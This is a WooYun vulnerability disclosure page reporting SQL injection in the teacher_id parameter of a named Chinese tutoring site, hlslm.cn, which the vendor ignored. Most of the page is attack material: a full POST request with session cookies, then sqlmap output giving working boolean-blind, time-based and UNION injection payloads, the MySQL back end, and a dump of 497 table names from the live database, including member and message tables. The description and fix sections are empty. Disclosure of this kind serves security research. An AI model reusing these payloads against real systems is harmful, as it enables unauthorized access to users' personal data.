当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0174843

漏洞标题:好老师联盟主站存在SQL注入漏洞

相关厂商:hlslm.cn

漏洞作者: 路人甲

提交时间:2016-02-17 12:43

修复时间:2016-02-22 12:50

公开时间:2016-02-22 12:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-17: 细节已通知厂商并且等待厂商处理中
2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /Home/Teacher/ajax_page_comment HTTP/1.1
Content-Length: 59
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.hlslm.cn/
Cookie: PHPSESSID=uuifmv0gfms25ihocpqabke5a3; where=0; userid=MDAwMDAwMDAwMA; looyu_id=4a42ce2895c61e8789659e8bfad168633d_47886%3A1; Hm_lvt_e3ffb67abfb33a0f3a329bc03d176c35=1454546295,1454546406,1454546428,1454546441; Hm_lpvt_e3ffb67abfb33a0f3a329bc03d176c35=1454546441; CNZZDATA1255216675=141508734-1454546299-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1454546299; looyu_47886=v%3A4a42ce2895c61e8789659e8bfad168633d%2Cref%3Ahttp%253A//www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m154.looyu.com/monitor; now_city_id=300; now_city=%E8%A5%BF%E5%AE%89; JSESSIONID=62CC6049B50C7B04D98CECCB7E015F4D.server99; HMACCOUNT=4E7992CB717057BC; BAIDUID=A74E8A8E61040DD87FCB1196C5B665A7:FG=1; teacher_list=16814%2C19411; bdshare_firstime=1454546472940
Host: www.hlslm.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
page=2&teacher_id=17279

1.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: teacher_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=2&teacher_id=17279) AND 4563=4563 AND (5745=5745
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=2&teacher_id=17279) AND (SELECT * FROM (SELECT(SLEEP(5)))aoUl) AND (1233=1233
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: page=2&teacher_id=17279) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71716a7171,0x64424a714c756d5a7a6a,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
back-end DBMS: MySQL 5.0.12
Database: bbs_52qiuxue
[497 tables]
+--------------------------------------+
| pre_access |
| pre_active_active_zh |
| pre_active_changeusername |
| pre_active_city_website_hooks |
| pre_active_city_website_push_log |
| pre_active_city_website_setting |
| pre_active_lottery_chance_zh |
| pre_active_lottery_line_zh |
| pre_active_lottery_zh |
| pre_active_questionnaire |
| pre_active_questionnaire_users |
| pre_active_share_qq_log |
| pre_amy_user_setting |
| pre_appbyme_config |
| pre_appbyme_portal_module |
| pre_appbyme_portal_module_source |
| pre_appbyme_user_setting |
| pre_article |
| pre_baidusubmit_setting |
| pre_baidusubmit_sitemap |
| pre_baidusubmit_urlstat |
| pre_class |
| pre_class_order_extends |
| pre_class_order_list |
| pre_class_room |
| pre_class_room_assist |
| pre_class_time |
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_favorite |
| pre_common_block_item |
| pre_common_block_item_data |
| pre_common_block_permission |
| pre_common_block_pic |
| pre_common_block_style |
| pre_common_block_xml |
| pre_common_cache |
| pre_common_card |
| pre_common_card_log |
| pre_common_card_type |
| pre_common_connect_guest |
| pre_common_credit_log |
| pre_common_credit_log_field |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_devicetoken |
| pre_common_district |
| pre_common_diy_data |
| pre_common_domain |
| pre_common_failedip |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_grouppm |
| pre_common_invite |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_action_log |
| pre_common_member_connect |
| pre_common_member_count |
| pre_common_member_crime |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_forum_buylog |
| pre_common_member_grouppm |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_medal |
| pre_common_member_newprompt |
| pre_common_member_profile |
| pre_common_member_profile_bak |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_secwhite |
| pre_common_member_stat_field |
| pre_common_member_status |
| pre_common_member_validate |
| pre_common_member_verify |
| pre_common_member_verify_info |
| pre_common_member_wechat |
| pre_common_member_wechatmp |
| pre_common_myapp |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_onlinetime |
| pre_common_optimizer |
| pre_common_patch |
| pre_common_plugin |
| pre_common_plugin_aliyunrec |
| pre_common_plugin_luckypacket |
| pre_common_plugin_luckypacketlog |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_relatedlink |
| pre_common_remote_port |
| pre_common_report |
| pre_common_searchindex |
| pre_common_seccheck |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_setting2 |
| pre_common_setting_150805 |
| pre_common_setting_150807 |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_tag |
| pre_common_tagitem |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_template_permission |
| pre_common_uin_black |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_verifycode |
| pre_common_visit |
| pre_common_word |
| pre_common_word_type |
| pre_connect_disktask |
| pre_connect_feedlog |
| pre_connect_memberbindlog |
| pre_connect_postfeedlog |
| pre_connect_tthreadlog |
| pre_day_forms |
| pre_dsu_paulsign |
| pre_dsu_paulsignemot |
| pre_dsu_paulsignset |
| pre_form |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachment_0 |
| pre_forum_attachment_1 |
| pre_forum_attachment_2 |
| pre_forum_attachment_3 |
| pre_forum_attachment_4 |
| pre_forum_attachment_5 |
| pre_forum_attachment_6 |
| pre_forum_attachment_7 |
| pre_forum_attachment_8 |
| pre_forum_attachment_9 |
| pre_forum_attachment_exif |
| pre_forum_attachment_unused |
| pre_forum_attachtype |
| pre_forum_bbcode |
| pre_forum_collection |
| pre_forum_collectioncomment |
| pre_forum_collectionfollow |
| pre_forum_collectioninvite |
| pre_forum_collectionrelated |
| pre_forum_collectionteamworker |
| pre_forum_collectionthread |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_filter_post |
| pre_forum_forum |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupuser |
| pre_forum_hotreply_member |
| pre_forum_hotreply_number |
| pre_forum_imagetype |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_newthread |
| pre_forum_onlinelist |
| pre_forum_order |
| pre_forum_pinggu |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_polloption_image |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post_location |
| pre_forum_post_moderate |
| pre_forum_post_tableid |
| pre_forum_postcache |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_poststick |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_replycredit |
| pre_forum_rsscache |
| pre_forum_sofa |
| pre_forum_spacecache |
| pre_forum_statlog |
| pre_forum_thread |
| pre_forum_thread_moderate |
| pre_forum_threadaddviews |
| pre_forum_threadcalendar |
| pre_forum_threadclass |
| pre_forum_threadclosed |
| pre_forum_threaddisablepos |
| pre_forum_threadhidelog |
| pre_forum_threadhot |
| pre_forum_threadimage |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadpartake |
| pre_forum_threadpreview |
| pre_forum_threadprofile |
| pre_forum_threadprofile_group |
| pre_forum_threadrush |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_typeoption |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_warning |
| pre_group |
| pre_group_class |
| pre_group_class_user |
| pre_home_access |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blog_moderate |
| pre_home_blogfield |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_comment_moderate |
| pre_home_docomment |
| pre_home_doing |
| pre_home_doing_moderate |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_follow |
| pre_home_follow_feed |
| pre_home_follow_feed_archiver |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_notification |
| pre_home_pic |
| pre_home_pic_moderate |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_share_moderate |
| pre_home_show |
| pre_home_specialuser |
| pre_home_surrounding_user |
| pre_home_userapp |
| pre_home_userappfield |
| pre_home_visitor |
| pre_invoice |
| pre_lev_login_auth_user |
| pre_lev_open_auth_user |
| pre_lev_open_login_user |
| pre_log |
| pre_mall_address |
| pre_mall_advertsion |
| pre_mall_advertsionswf |
| pre_mall_down_15 |
| pre_mall_down_data_15 |
| pre_mall_favorite |
| pre_mall_fields |
| pre_mall_list |
| pre_mall_order |
| pre_mall_relation |
| pre_mall_shopping |
| pre_mall_withdata |
| pre_mobile_setting |
| pre_mobile_wechat_authcode |
| pre_mobile_wechat_masssend |
| pre_mobile_wechat_resource |
| pre_mobile_wsq_threadlist |
| pre_moodwall |
| pre_myrepeats |
| pre_node |
| pre_node_operation |
| pre_picc |
| pre_plugin_admincp_per |
| pre_plugin_auction |
| pre_plugin_auction_message |
| pre_plugin_auction_xml |
| pre_plugin_auctionapply |
| pre_plugin_blessing |
| pre_plugin_formmanage_formlist |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_moderate |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_comment_moderate |
| pre_portal_rsscache |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_resource_auth_group |
| pre_resource_auth_group_user |
| pre_role |
| pre_role_user |
| pre_role_user_copy |
| pre_security_evilpost |
| pre_security_eviluser |
| pre_security_failedlog |
| pre_send_sms_log |
| pre_teacher_admin_log |
| pre_teacher_area |
| pre_teacher_artice |
| pre_teacher_article |
| pre_teacher_auditiondata |
| pre_teacher_auditionlog |
| pre_teacher_auth_base |
| pre_teacher_auth_class |
| pre_teacher_auth_courses |
| pre_teacher_auth_experience |
| pre_teacher_auth_gold |
| pre_teacher_auth_index |
| pre_teacher_auth_info |
| pre_teacher_auth_log |
| pre_teacher_auth_success_case |
| pre_teacher_china |
| pre_teacher_collect |
| pre_teacher_comment |
| pre_teacher_commission_log |
| pre_teacher_consumption |
| pre_teacher_coupons |
| pre_teacher_coupons_auth |
| pre_teacher_coupons_send |
| pre_teacher_coupons_send_bak |
| pre_teacher_course_1 |
| pre_teacher_course_register |
| pre_teacher_course_time_1 |
| pre_teacher_course_type_1 |
| pre_teacher_courses |
| pre_teacher_courses_copy |
| pre_teacher_customer_call_log |
| pre_teacher_data_manage |
| pre_teacher_data_manage_channel |
| pre_teacher_data_manage_copy |
| pre_teacher_data_manage_log |
| pre_teacher_detail |
| pre_teacher_experience |
| pre_teacher_feedback |
| pre_teacher_fund_log |
| pre_teacher_home_work |
| pre_teacher_main |
| pre_teacher_member_bak |
| pre_teacher_member_log |
| pre_teacher_member_profile_bak |
| pre_teacher_message_reminder |
| pre_teacher_message_reminder_copy |
| pre_teacher_msg_list |
| pre_teacher_msg_log |
| pre_teacher_need |
| pre_teacher_need_accept |
| pre_teacher_need_copy |
| pre_teacher_need_copy1 |
| pre_teacher_need_log |
| pre_teacher_need_order_detaill |
| pre_teacher_need_status |
| pre_teacher_need_tip |
| pre_teacher_order |
| pre_teacher_order_consumption_log |
| pre_teacher_order_copy |
| pre_teacher_parm |
| pre_teacher_pay_log |
| pre_teacher_plan |
| pre_teacher_plan_content |
| pre_teacher_points |
| pre_teacher_proportion_rules |
| pre_teacher_propotion_isopen |
| pre_teacher_qrcode |
| pre_teacher_qrcode_group |
| pre_teacher_resources_manage |
| pre_teacher_send_sms_log |
| pre_teacher_sign |
| pre_teacher_sign_log |
| pre_teacher_statistics |
| pre_teacher_student_base |
| pre_teacher_student_base_copy |
| pre_teacher_student_class_feedback |
| pre_teacher_student_contact |
| pre_teacher_student_sign_feedback |
| pre_teacher_student_statistics |
| pre_teacher_success_case |
| pre_teacher_teacher_base |
| pre_teacher_teacher_comment |
| pre_teacher_teacher_extend |
| pre_teacher_teacher_inside_comment |
| pre_teacher_tp_admin_log |
| pre_teacher_tp_appointment |
| pre_teacher_tp_appointment_copy |
| pre_teacher_tp_area |
| pre_teacher_tp_index |
| pre_teacher_tp_pay_log |
| pre_teacher_tp_type |
| pre_teacher_tp_user_comments |
| pre_teacher_tp_user_false_data |
| pre_teacher_tp_user_false_parm |
| pre_teacher_tp_user_feedback |
| pre_teacher_umemberfields_bak |
| pre_teacher_umembers_bak |
| pre_teacher_user_comment |
| pre_teacher_wechat_audition_send_log |
| pre_teacher_wechat_send_log |
| pre_teacher_wrong_log |
| pre_teacher_wxvote |
| pre_teacher_wxvote_people |
| pre_teachers_teachers_extends |
| pre_ucenter_admins |
| pre_ucenter_amy_pm_heart |
| pre_ucenter_applications |
| pre_ucenter_badwords |
| pre_ucenter_domains |
| pre_ucenter_failedlogins |
| pre_ucenter_feeds |
| pre_ucenter_friends |
| pre_ucenter_mailqueue |
| pre_ucenter_memberfields |
| pre_ucenter_members |
| pre_ucenter_members_copy2 |
| pre_ucenter_mergemembers |
| pre_ucenter_newpm |
| pre_ucenter_notelist |
| pre_ucenter_pm_indexes |
| pre_ucenter_pm_lists |
| pre_ucenter_pm_members |
| pre_ucenter_pm_messages_0 |
| pre_ucenter_pm_messages_1 |
| pre_ucenter_pm_messages_2 |
| pre_ucenter_pm_messages_3 |
| pre_ucenter_pm_messages_4 |
| pre_ucenter_pm_messages_5 |
| pre_ucenter_pm_messages_6 |
| pre_ucenter_pm_messages_7 |
| pre_ucenter_pm_messages_8 |
| pre_ucenter_pm_messages_9 |
| pre_ucenter_protectedmembers |
| pre_ucenter_settings |
| pre_ucenter_sqlcache |
| pre_ucenter_tags |
| pre_ucenter_vars |
| pre_user |
| pre_wechat_log |
| pre_weixin_binding |
| pre_weixin_dy_back |
| pre_weixin_dy_log |
| pre_weixin_http_log |
| pre_weixin_log |
| pre_weixin_parm |
| pre_weixin_push |
| pre_weixin_qy_log |
| pre_will_log |
| sms_recv |
| sms_send |
+--------------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-22 12:50

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无